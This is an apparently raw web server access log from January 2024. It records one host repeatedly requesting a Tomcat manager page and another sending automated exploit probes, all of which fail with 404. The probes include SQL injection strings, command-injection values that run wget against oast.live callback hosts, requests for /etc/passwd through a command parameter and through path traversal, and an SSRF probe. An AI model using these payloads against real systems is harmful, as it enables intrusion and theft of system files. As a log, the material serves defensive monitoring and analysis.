149.56.151.201 - - [21/Jan/2024:11:41:17 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:41:21 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:41:24 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:41:28 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:41:31 +0100] "GET /manager/html HTTP/1.1" 401 1833
137.220.197.141 - - [21/Jan/2024:11:41:31 +0100] "POST /apply_sec.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:41:33 +0100] "POST /apply_sec.cgi HTTP/1.1" 404 952
149.56.151.201 - - [21/Jan/2024:11:41:35 +0100] "GET /manager/html HTTP/1.1" 401 1833
137.220.197.141 - - [21/Jan/2024:11:41:35 +0100] "POST /apply_sec.cgi HTTP/1.1" 404 952
149.56.151.201 - - [21/Jan/2024:11:41:38 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:41:42 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:41:45 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:41:48 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:41:52 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:41:55 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:41:59 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:42:02 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:42:06 +0100] "GET /manager/html HTTP/1.1" 401 1833
137.220.197.141 - - [21/Jan/2024:11:42:06 +0100] "POST /apply_sec.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:42:08 +0100] "GET /admin/?n=product&c=product_admin&a=dopara&app_type=shop&id=1%20union%20SELECT%201,2,3,25367*75643,5,6,7%20limit%205,1%20%23 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:42:08 +0100] "POST /apply_sec.cgi HTTP/1.1" 404 952
149.56.151.201 - - [21/Jan/2024:11:42:10 +0100] "GET /manager/html HTTP/1.1" 401 1833
137.220.197.141 - - [21/Jan/2024:11:42:10 +0100] "POST /apply_sec.cgi HTTP/1.1" 404 952
149.56.151.201 - - [21/Jan/2024:11:42:13 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:42:16 +0100] "GET /manager/html HTTP/1.1" 401 1833
137.220.197.141 - - [21/Jan/2024:11:42:19 +0100] "GET /admin/?n=product&c=product_admin&a=dopara&app_type=shop&id=1%20union%20SELECT%201,2,3,25367*75643,5,6,7%20limit%205,1%20%23 HTTP/1.1" 404 952
149.56.151.201 - - [21/Jan/2024:11:42:19 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:42:23 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:42:26 +0100] "GET /manager/html HTTP/1.1" 401 1833
137.220.197.141 - - [21/Jan/2024:11:42:28 +0100] "POST /session_login.cgi HTTP/1.1" 404 952
149.56.151.201 - - [21/Jan/2024:11:42:30 +0100] "GET /manager/html HTTP/1.1" 401 1833
137.220.197.141 - - [21/Jan/2024:11:42:30 +0100] "POST /rpc.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:42:31 +0100] "GET /admin/?n=product&c=product_admin&a=dopara&app_type=shop&id=1%20union%20SELECT%201,2,3,25367*75643,5,6,7%20limit%205,1%20%23 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:42:32 +0100] "POST /session_login.cgi HTTP/1.1" 404 952
149.56.151.201 - - [21/Jan/2024:11:42:32 +0100] "GET /manager/html HTTP/1.1" 401 1833
137.220.197.141 - - [21/Jan/2024:11:42:34 +0100] "POST /rpc.cgi HTTP/1.1" 404 952
149.56.151.201 - - [21/Jan/2024:11:42:37 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:42:40 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:42:44 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:42:47 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:42:50 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:42:54 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:42:57 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:43:01 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:43:04 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:43:08 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:43:12 +0100] "GET /manager/html HTTP/1.1" 401 1833
137.220.197.141 - - [21/Jan/2024:11:43:12 +0100] "POST /session_login.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:43:14 +0100] "POST /rpc.cgi HTTP/1.1" 404 952
149.56.151.201 - - [21/Jan/2024:11:43:14 +0100] "GET /manager/html HTTP/1.1" 401 1833
137.220.197.141 - - [21/Jan/2024:11:43:16 +0100] "POST /session_login.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:43:18 +0100] "POST /rpc.cgi HTTP/1.1" 404 952
149.56.151.201 - - [21/Jan/2024:11:43:18 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:43:22 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:43:25 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:43:29 +0100] "GET /manager/html HTTP/1.1" 401 1833
137.220.197.141 - - [21/Jan/2024:11:43:32 +0100] "POST /wp-json/visualizer/v1/upload-data HTTP/1.1" 404 952
149.56.151.201 - - [21/Jan/2024:11:43:32 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:43:36 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:43:40 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:43:43 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:43:47 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:43:50 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:43:54 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:43:57 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:44:01 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:44:04 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:44:07 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:44:11 +0100] "GET /manager/html HTTP/1.1" 401 1833
137.220.197.141 - - [21/Jan/2024:11:44:12 +0100] "POST /wp-json/visualizer/v1/upload-data HTTP/1.1" 404 952
149.56.151.201 - - [21/Jan/2024:11:44:14 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:44:18 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:44:22 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:44:26 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:44:29 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:44:32 +0100] "GET /manager/html HTTP/1.1" 401 1833
137.220.197.141 - - [21/Jan/2024:11:44:32 +0100] "POST /wp-json/visualizer/v1/upload-data HTTP/1.1" 404 952
149.56.151.201 - - [21/Jan/2024:11:44:36 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:44:39 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:44:43 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:44:46 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:44:50 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:44:53 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:44:57 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:45:00 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:45:04 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:45:07 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:45:11 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:45:14 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:45:18 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:45:21 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:45:24 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:45:28 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:45:31 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:45:35 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:45:38 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:45:42 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:45:45 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:45:49 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:45:52 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:45:56 +0100] "GET /manager/html HTTP/1.1" 401 1833
137.220.197.141 - - [21/Jan/2024:11:45:57 +0100] "GET /admin/?n=product&c=product_admin&a=dopara&app_type=shop&id=1%20union%20SELECT%201,2,3,25367*75643,5,6,7%20limit%205,1%20%23 HTTP/1.1" 404 952
149.56.151.201 - - [21/Jan/2024:11:45:59 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:46:03 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:46:06 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:46:09 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:46:13 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:46:16 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:46:20 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:46:23 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:46:27 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:46:30 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:46:34 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:46:37 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:46:41 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:46:44 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:46:47 +0100] "GET /manager/html HTTP/1.1" 401 1833
137.220.197.141 - - [21/Jan/2024:11:46:47 +0100] "GET /admin/?n=product&c=product_admin&a=dopara&app_type=shop&id=1%20union%20SELECT%201,2,3,25367*75643,5,6,7%20limit%205,1%20%23 HTTP/1.1" 404 952
149.56.151.201 - - [21/Jan/2024:11:46:51 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:46:54 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:46:58 +0100] "GET /manager/html HTTP/1.1" 401 1833
137.220.197.141 - - [21/Jan/2024:11:47:12 +0100] "GET /admin/?n=product&c=product_admin&a=dopara&app_type=shop&id=1%20union%20SELECT%201,2,3,25367*75643,5,6,7%20limit%205,1%20%23 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:47:58 +0100] "POST /wp-json/visualizer/v1/upload-data HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:49:49 +0100] "POST /wp-json/visualizer/v1/upload-data HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:50:01 +0100] "POST /wp-json/visualizer/v1/upload-data HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:50:17 +0100] "GET /Collector/storagemgmt/apply?data%5B0%5D%5Bhost%5D=%60/bin/wget+http://cmm00rc3m87t5g88qsogidezfxobxuah9.oast.live%60&data%5B0%5D%5Bpath%5D=mypath&data%5B0%5D%5Btype%5D=mytype HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:51:25 +0100] "POST /apply_sec.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:51:27 +0100] "GET /admin/?n=product&c=product_admin&a=dopara&app_type=shop&id=1%20union%20SELECT%201,2,3,25367*75643,5,6,7%20limit%205,1%20%23 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:51:27 +0100] "POST /apply_sec.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:51:29 +0100] "POST /apply_sec.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:51:34 +0100] "GET /Collector/storagemgmt/apply?data%5B0%5D%5Bhost%5D=%60/bin/wget+http://cmm00rc3m87t5g88qsog99eckp4xnjqj1.oast.live%60&data%5B0%5D%5Bpath%5D=mypath&data%5B0%5D%5Btype%5D=mytype HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:52:43 +0100] "GET /Collector/nms/addModifyZTDProxy?ztd_server=127.0.0.1&ztd_port=3333&ztd_username=user&ztd_password=$(/bin/wget$IFShttp://cmm00rc3m87t5g88qsogo97dutm341d8k.oast.live) HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:52:49 +0100] "POST /admin/?n=language&c=language_general&a=doExportPack HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:53:35 +0100] "GET /admin/?n=product&c=product_admin&a=dopara&app_type=shop&id=1%20union%20SELECT%201,2,3,25367*75643,5,6,7%20limit%205,1%20%23 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:53:48 +0100] "POST /apply_sec.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:53:50 +0100] "GET /admin/?n=product&c=product_admin&a=dopara&app_type=shop&id=1%20union%20SELECT%201,2,3,25367*75643,5,6,7%20limit%205,1%20%23 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:53:50 +0100] "POST /apply_sec.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:53:52 +0100] "POST /apply_sec.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:53:57 +0100] "GET /pages/systemcall.php?command=cat%20/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:54:00 +0100] "GET /Collector/nms/addModifyZTDProxy?ztd_server=127.0.0.1&ztd_port=3333&ztd_username=user&ztd_password=$(/bin/wget$IFShttp://cmm00rc3m87t5g88qsog1c136su79jh5c.oast.live) HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:54:08 +0100] "POST /admin/?n=language&c=language_general&a=doExportPack HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:54:17 +0100] "POST /admin/?n=language&c=language_general&a=doExportPack HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:54:29 +0100] "POST /admin/?n=language&c=language_general&a=doExportPack HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:54:50 +0100] "POST /apply_sec.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:54:52 +0100] "POST /apply_sec.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:54:54 +0100] "POST /apply_sec.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:55:29 +0100] "GET /pages/systemcall.php?command=cat%20/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:55:40 +0100] "GET /pages/systemcall.php?command=cat%20/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:55:52 +0100] "GET /pages/systemcall.php?command=cat%20/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:56:05 +0100] "GET /admin/?n=language&c=language_general&a=doSearchParameter&editor=cn&word=search&appno=0+union+select+98989*443131,1--+&site=admin HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:56:09 +0100] "POST /ui/api/v1/ui/auth/login HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:57:09 +0100] "POST /admin/?n=language&c=language_general&a=doExportPack HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:57:25 +0100] "POST /ui/api/v1/ui/auth/login HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:57:34 +0100] "POST /ui/api/v1/ui/auth/login HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:57:40 +0100] "GET /admin/?n=language&c=language_general&a=doSearchParameter&editor=cn&word=search&appno=0+union+select+98989*443131,1--+&site=admin HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:57:46 +0100] "POST /ui/api/v1/ui/auth/login HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:57:51 +0100] "POST /admin/?n=language&c=language_general&a=doExportPack HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:57:51 +0100] "GET /admin/?n=language&c=language_general&a=doSearchParameter&editor=cn&word=search&appno=0+union+select+98989*443131,1--+&site=admin HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:57:58 +0100] "POST /getcfg.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:58:04 +0100] "GET /admin/?n=language&c=language_general&a=doSearchParameter&editor=cn&word=search&appno=0+union+select+98989*443131,1--+&site=admin HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:58:13 +0100] "POST /admin/?n=language&c=language_general&a=doExportPack HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:59:17 +0100] "GET /pages/systemcall.php?command=cat%20/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:59:28 +0100] "POST /getcfg.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:59:39 +0100] "POST /getcfg.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:59:51 +0100] "POST /getcfg.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:00:07 +0100] "GET /pages/systemcall.php?command=cat%20/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:00:30 +0100] "GET /pages/systemcall.php?command=cat%20/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:00:30 +0100] "POST /ui/api/v1/ui/auth/login HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:01:12 +0100] "POST /ui/api/v1/ui/auth/login HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:01:30 +0100] "POST /ui/api/v1/ui/auth/login HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:01:32 +0100] "GET /admin/?n=language&c=language_general&a=doSearchParameter&editor=cn&word=search&appno=0+union+select+98989*443131,1--+&site=admin HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:01:39 +0100] "POST /admin/?n=language&c=language_general&a=doExportPack HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:02:26 +0100] "GET /admin/?n=language&c=language_general&a=doSearchParameter&editor=cn&word=search&appno=0+union+select+98989*443131,1--+&site=admin HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:02:50 +0100] "GET /admin/?n=language&c=language_general&a=doSearchParameter&editor=cn&word=search&appno=0+union+select+98989*443131,1--+&site=admin HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:03:08 +0100] "POST /getcfg.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:03:31 +0100] "POST /admin/?n=language&c=language_general&a=doExportPack HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:03:43 +0100] "POST /admin/?n=language&c=language_general&a=doExportPack HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:03:55 +0100] "POST /getcfg.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:04:19 +0100] "POST /getcfg.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:04:42 +0100] "GET /pages/systemcall.php?command=cat%20/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:04:47 +0100] "GET /jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd HTTP/1.1" 404 952
146.19.24.23 - - [21/Jan/2024:12:04:52 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:05:01 +0100] "POST /ui/api/v1/ui/auth/login HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:06:13 +0100] "GET /solr/admin/cores?wt=json HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:06:23 +0100] "GET /jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:06:34 +0100] "GET /jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:06:34 +0100] "POST /apply_sec.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:06:37 +0100] "POST /apply_sec.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:06:39 +0100] "POST /apply_sec.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:06:48 +0100] "GET /jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:06:54 +0100] "GET /pages/systemcall.php?command=cat%20/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:06:57 +0100] "POST /ui/api/v1/ui/auth/login HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:07:09 +0100] "POST /ui/api/v1/ui/auth/login HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:07:09 +0100] "GET /admin/?n=language&c=language_general&a=doSearchParameter&editor=cn&word=search&appno=0+union+select+98989*443131,1--+&site=admin HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:07:09 +0100] "GET /pages/systemcall.php?command=cat%20/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:07:39 +0100] "GET /?pum_action=tools_page_tab_system_info HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:07:41 +0100] "POST / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:08:09 +0100] "GET /solr/admin/cores?wt=json HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:08:23 +0100] "GET /solr/admin/cores?wt=json HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:08:23 +0100] "POST /getcfg.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:08:41 +0100] "GET /solr/admin/cores?wt=json HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:09:24 +0100] "GET /admin/?n=language&c=language_general&a=doSearchParameter&editor=cn&word=search&appno=0+union+select+98989*443131,1--+&site=admin HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:09:39 +0100] "GET /admin/?n=language&c=language_general&a=doSearchParameter&editor=cn&word=search&appno=0+union+select+98989*443131,1--+&site=admin HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:10:17 +0100] "GET /?pum_action=tools_page_tab_system_info HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:10:19 +0100] "POST / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:10:19 +0100] "GET /jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:10:32 +0100] "POST /getcfg.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:10:38 +0100] "GET /?pum_action=tools_page_tab_system_info HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:10:40 +0100] "POST / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:10:46 +0100] "POST /getcfg.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:11:02 +0100] "GET /?pum_action=tools_page_tab_system_info HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:11:04 +0100] "POST / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:11:12 +0100] "GET /jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:11:37 +0100] "GET /jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:12:45 +0100] "GET /solr/admin/cores?wt=json HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:12:46 +0100] "POST /apply_sec.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:12:48 +0100] "POST /apply_sec.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:12:50 +0100] "POST /apply_sec.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:13:26 +0100] "POST /apply_sec.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:13:28 +0100] "POST /apply_sec.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:13:30 +0100] "POST /apply_sec.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:13:51 +0100] "GET /solr/admin/cores?wt=json HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:14:13 +0100] "POST /servlet/UploadServlet HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:14:15 +0100] "GET /test.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:14:23 +0100] "GET /solr/admin/cores?wt=json HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:15:24 +0100] "GET /api-third-party/download/extdisks../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:15:56 +0100] "GET /jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:16:36 +0100] "GET /getFavicon?host=http://oast.fun/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:16:41 +0100] "GET /?pum_action=tools_page_tab_system_info HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:16:43 +0100] "POST / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:16:59 +0100] "GET /api-third-party/download/extdisks../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:17:08 +0100] "POST /servlet/UploadServlet HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:17:10 +0100] "GET /test.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:12:17:10 +0100] "GET /api-third-party/download/extdisks../etc/passwd HTTP/1.1" 404 952
